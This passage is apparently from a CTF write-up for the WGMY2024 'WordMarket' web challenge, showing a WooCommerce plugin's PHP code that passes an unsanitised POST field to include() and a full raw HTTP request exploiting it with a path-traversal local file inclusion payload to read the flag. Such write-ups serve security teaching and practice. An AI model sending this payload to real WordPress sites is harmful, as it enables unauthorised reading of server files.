<h3 id="Newest-version"><a href="#Newest-version" class="headerlink" title="Newest version"></a>Newest version</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">if ( ! empty( $value ) &amp;&amp; ! empty( $_POST[&#x27;wc_csz_countries_codes&#x27;] ) &amp;&amp; ! empty( $_POST[&#x27;wc_csz_set_zone_country&#x27;] ) &amp;&amp; ! empty( $_POST[&#x27;wc_csz_set_zone_id&#x27;] ) )  &#123;</span><br><span class="line">    $selected_country_codes = get_option( &#x27;wc_csz_countries_codes&#x27; );</span><br><span class="line">    if ( $selected_country_codes &amp;&amp; in_array( $_POST[&#x27;wc_csz_set_zone_country&#x27;], $selected_country_codes ) )  &#123;</span><br><span class="line">        include( &#x27;i18n/cities/&#x27; . $_POST[&#x27;wc_csz_set_zone_country&#x27;] . &#x27;.php&#x27; );</span><br></pre></td></tr></table></figure>
<p>The old version does not sanitise or validate the <code>$_POST[&#39;wc_csz_set_zone_country&#39;]</code> variable and includes the file, while the newest version does some validation on it.</p>
<p>This allows us to submit <code>wc_csz_set_zone_country</code> as a LFI payload to read the flag.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line">POST /wp-admin/admin.php?page=wc-settings&amp;tab=csz HTTP/1.1</span><br><span class="line">Host: 46.137.193.2</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Referer: http://46.137.193.2/wp-admin/admin.php?page=wc-settings&amp;tab=csz</span><br><span class="line">Content-Type: multipart/form-data; boundary=---------------------------210887596025511864121001511850</span><br><span class="line">Content-Length: 1693</span><br><span class="line">Origin: http://46.137.193.2</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: wordpress_3311b9f60991901073bd9218c0d79704=a%7C1735572193%7C1pj112UJugtKBPJhFj4Y40tmoquEz467uv7hEMrxw2D%7C20244e358e63d8519e09d670a9382263c2da87638b329732fc11aaa2c0b4f6e6; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-12-28%2011%3A24%3A55%7C%7C%7Cep%3Dhttp%3A%2F%2F46.137.193.2%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-12-28%2011%3A24%3A55%7C%7C%7Cep%3Dhttp%3A%2F%2F46.137.193.2%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D3%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28X11%3B%20Linux%20x86_64%3B%20rv%3A109.0%29%20Gecko%2F20100101%20Firefox%2F115.0; sbjs_session=pgs%3D11%7C%7C%7Ccpg%3Dhttp%3A%2F%2F46.137.193.2%2F%3Fpage_id%3D7; wordpress_logged_in_3311b9f60991901073bd9218c0d79704=a%7C1735572193%7C1pj112UJugtKBPJhFj4Y40tmoquEz467uv7hEMrxw2D%7C564e2ac4026a5e82620983a1e7ada0bf949841b8fc25e19dfea2ad62e17d9e1d; tk_ai=woo%3ASAWSnZqXCrTtHegncoTnMLYZ; wp-settings-time-9=1735399668; tk_qs=; woocommerce_items_in_cart=1; woocommerce_cart_hash=0bac13db878f239fe7f0bda0cc044557; wp_woocommerce_session_3311b9f60991901073bd9218c0d79704=9%7C%7C1735572394%7C%7C1735568794%7C%7Cffdf37f77921054659a5999ba1dd70da; wp-settings-9=mfold%3Do</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;wc_csz_countries_codes[]&quot;</span><br><span class="line"></span><br><span class="line">AF</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;wc_csz_countries_codes[]&quot;</span><br><span class="line"></span><br><span class="line">US</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;wc_csz_populate_state&quot;</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;wc_csz_new_state_field&quot;</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;wc_csz_checkout_restrict_states&quot;</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;wc_csz_shipping_distance_fee&quot;</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;wc_csz_set_zone_locations&quot;</span><br><span class="line"></span><br><span class="line">2</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;wc_csz_set_zone_country&quot;</span><br><span class="line"></span><br><span class="line">../../../../../../../../../../../flag</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;wc_csz_set_zone_id&quot;</span><br><span class="line"></span><br><span class="line">2</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;save&quot;</span><br><span class="line"></span><br><span class="line">Save changes</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;_wpnonce&quot;</span><br><span class="line"></span><br><span class="line">d0e0398ee1</span><br><span class="line">-----------------------------210887596025511864121001511850</span><br><span class="line">Content-Disposition: form-data; name=&quot;_wp_http_referer&quot;</span><br><span class="line"></span><br><span class="line">/wp-admin/admin.php?page=wc-settings&amp;tab=csz</span><br><span class="line">-----------------------------210887596025511864121001511850--</span><br></pre></td></tr></table></figure>

<p><img src="https://hackmd.io/_uploads/S155qKCSJg.png" alt="image"></p>
<p><code>wgmy&#123;e707f597a4f30cd6da22293ea56f53a4&#125;</code></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-Warmup-2"><span class="toc-number">1.</span> <span class="toc-text">[Web] Warmup 2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description"><span class="toc-number">1.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis"><span class="toc-number">1.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution"><span class="toc-number">1.3.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-myFile"><span class="toc-number">2.</span> <span class="toc-text">[Web] myFile</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-1"><span class="toc-number">2.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-1"><span class="toc-number">2.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-1"><span class="toc-number">2.3.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-WordMarket"><span class="toc-number">3.</span> <span class="toc-text">[Web] WordMarket</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-2"><span class="toc-number">3.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-2"><span class="toc-number">3.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-2"><span class="toc-number">3.3.</span> <span class="toc-text">Solution</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Old-version"><span class="toc-number">3.3.1.</span> <span class="toc-text">Old version</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Newest-version"><span class="toc-number">3.3.2.</span> <span class="toc-text">Newest version</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://chuajianshen.github.io/2024/12/29/WGMY2024/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&text=WGMY2024"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&is_video=false&description=WGMY2024"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=WGMY2024&body=Check out this article: https://chuajianshen.github.io/2024/12/29/WGMY2024/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&title=WGMY2024"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://chuajianshen.github.io/2024/12/29/WGMY2024/&name=WGMY2024&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://chuajianshen.github.io/2024/12/29/WGMY2024/&t=WGMY2024"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    Shen
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
